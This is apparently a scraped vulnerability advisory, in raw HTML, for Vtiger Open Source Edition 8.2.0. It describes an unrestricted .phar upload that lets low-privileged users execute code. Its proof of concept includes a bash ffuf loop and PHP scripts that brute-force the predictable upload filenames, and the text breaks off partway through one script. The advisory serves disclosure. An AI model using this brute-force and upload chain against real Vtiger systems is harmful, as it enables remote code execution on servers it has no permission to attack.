\nAffected Version<\/strong>: Open Source Edition 8.2.0
\nVulnerability Type<\/strong>:Unrestricted Upload of File with Dangerous Type (CWE-434)
\nSecurity Risk<\/strong>: Critical
\nVendor<\/strong>: Vtiger
\nVendor URL<\/strong>: https:\/\/www.vtiger.com\/<\/a>
\nVendor acknowledged vulnerability<\/strong>: Yes
\nVendor Status<\/strong>: Not fixed
\nCVE Number<\/strong>: Requested
\nCVE Link<\/strong>: Requested<\/p>\n
Description<\/h3>\n
Vtiger Open Source Edition 8.2.0 allows low-privileged authenticated users to execute arbitrary code. The document module has an insufficient deny list, allowing the upload of .phar<\/strong> files. The storage location can be brute-forced, allowing the execution of the uploaded file. The default Docker image is vulnerable, as well as all systems that are configured to evaluate .phar<\/strong> files.<\/p>\n A file containing the payload, phpinfo.phar<\/strong> with content <\/strong> in this example, can be uploaded via the webinterface.<\/p>\n The file is uploaded to a subdirectory of storage\/<YYYY>\/<MonthFullName>\/<WeekInMonth>\/<\/strong>. Its filename is generated using the following function.<\/p>\n In the default Docker installation, brute-forcing the filename is not necessary since directory listings are enabled.<\/p>\n If directory listings were not enabled, the possible encrypted filenames are brute-forceable. The following listing shows the used scripts.<\/p>\nProof of Concept<\/h3>\n
![\"\"](\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/05\/DocumentCreation.png\")
<\/p>\n<\/span>public static function getEncryptedFileName($sanitizedFileName) {<\/span>
$encryptedFileName = $sanitizedFileName;<\/span>
if ($sanitizedFileName) {<\/span>
$fileNameParts = explode('.', decode_html($sanitizedFileName));<\/span>
$fileType = array_pop($fileNameParts);<\/span>
$encryptedFileName = md5(md5(microtime(true)).implode('.', $fileNameParts)).'.'.$fileType;<\/span>
}<\/span>
return $encryptedFileName;<\/span>
}<\/span>
<\/pre>\n<\/div>\n![\"\"](\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2025\/05\/DirectoryListing.png\")
<\/p>\n<\/span>#!\/bin\/bash<\/span>\nBASE_URL<\/span>=<\/span>\"[http:\/\/localhost\"<\/span>]()<\/span>\nFILE_ID<\/span>=<\/span>\"34\"<\/span>\nFILE_NAME<\/span>=<\/span>\"phpinfo.phar\"<\/span>\nFILE_DATE_STRING<\/span>=<\/span>\"2024-09-20 07:19 AM\"<\/span>\nPATH_BASE<\/span>=<\/span>$(<\/span>php <\/span>GenBasePath.php <\/span>\"<\/span>$FILE_ID<\/span>\"<\/span> <\/span>\"<\/span>$FILE_DATE_STRING<\/span>\"<\/span>)<\/span>\nfor<\/span> <\/span>SEC_OFFSET <\/span>in<\/span> <\/span>$(<\/span>seq <\/span>0<\/span> <\/span>60<\/span>)<\/span>;<\/span> <\/span>do<\/span>\n <\/span>echo<\/span> <\/span>\"Trying second offset <\/span>$SEC_OFFSET<\/span>\"<\/span>\n <\/span>ffuf <\/span>-u <\/span>${<\/span>BASE_URL<\/span>}<\/span>\/storage\/${<\/span>PATH_BASE<\/span>}<\/span>FUZZ <\/span>-w <\/span><(<\/span>php <\/span>GenPotentialNames.php <\/span>\"<\/span>$FILE_ID<\/span>\"<\/span> <\/span>\"<\/span>$FILE_NAME<\/span>\"<\/span> <\/span>\"<\/span>$FILE_DATE_STRING<\/span>\"<\/span> <\/span>\"<\/span>$SEC_OFFSET<\/span>\"<\/span>)<\/span> <\/span>-noninteractive <\/span>-s\ndone<\/span>;<\/span>\n<\/pre>\n<\/div>\n<\/span><?php<\/span>\n$fileName<\/span> =<\/span> $argv<\/span>[<\/span>1<\/span>];<\/span>\n$initialTimestamp<\/span> =<\/span> strtotime<\/span>(<\/span>$argv<\/span>[<\/span>2<\/span>]);<\/span>\n$secOffset<\/span> =<\/span> intval<\/span>(<\/span>$argv<\/span>[<\/span>3<\/span>]);<\/span>\n\/\/$microsecond = 1 \/ 1000000; \/\/ While this is a real microsecond, PHP does not seem to have sufficient precision<\/span>\n$microsecond<\/span> =<\/span> 1<\/span> \/<\/span> 10000<\/span>;<\/span> \/\/ This suffices.<\/span>\n$fileNameParts<\/span> =<\/span> explode<\/span>(<\/span>'.'<\/span>,<\/span> $fileName<\/span>);<\/span>\n$fileType<\/span> =<\/span> array_pop<\/span>(<\/span>$fileNameParts<\/span>);<\/span>\nfor<\/span>(<\/span>$iTs<\/span> =<\/span> $initialTimestamp<\/span> +<\/span> $secOffset<\/span>;<\/span> $iTs<\/span> <=<\/span> $initialTimestamp<\/span> +<\/span> $secOffset<\/span> +<\/span> 1<\/span>;<\/span> $iTs<\/span> +=<\/span> $microsecond<\/span>)<\/span> {<\/span>\n $encryptedFileName<\/span> =<\/span> md5<\/span>(<\/span>md5<\/span>(<\/span>$iTs<\/span>)<\/span>.<\/span>implode<\/span>(<\/span>'.'<\/span>,<\/span> $fileNameParts<\/span>))<\/span>.<\/span>'.'<\/span>.<\/span>$fileType<\/span>;<\/span>\n echo<\/span> $encryptedFileName<\/span> .<\/span> \"<\/span>\\n<\/span>\"<\/span>;<\/span>\n}<\/span>\n?><\/span>\n<\/pre>\n<\/div>\n<\/span><?php<\/span>\n$fileId<\/span> =<\/span> $argv<\/span>[<\/span>1<\/span>];<\/span>\n$initialTimestamp<\/span> =<\/span> strtotime<\/span>(<\/span>$argv<\/span>[<\/span>2<\/span>]);<\/span>\n$weekInMonth<\/span> =<\/span> date<\/span>(<\/span>'W'<\/span>,<\/span> $initialTimestamp<\/span>)<\/span> -<\/span> date<\/span>(<\/span>'W'<\/span>,<\/span> strtotime<\/span>(<\/span>date<\/span>(<\/span>'Y-m-01'<\/span>,<\/span> $initialTimestamp<\/span>)));<\/span>\n$pathBase<\/span>